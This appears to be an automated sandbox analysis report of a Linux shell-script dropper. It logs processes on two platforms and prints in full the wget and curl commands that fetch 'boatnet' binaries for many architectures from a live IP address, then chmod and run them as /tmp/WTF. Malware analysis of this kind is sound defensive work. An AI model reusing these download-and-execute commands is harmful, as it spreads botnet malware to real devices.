Analysis Overview
SHA256
9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b
Threat Level: Shows suspicious behavior
The file 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 02:44
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-29 02:44
Reported
2024-10-29 02:47
Platform
debian9-mipsel-20240611-en
Max time kernel
49s
Max time network
52s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WTF | /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh | N/A |
Processes
/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh
[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 02:44
Reported
2024-10-29 02:47
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
28s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WTF | /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh | N/A |
Processes
/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh
[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 154.216.19.166:3000 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 89.187.167.7:443 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
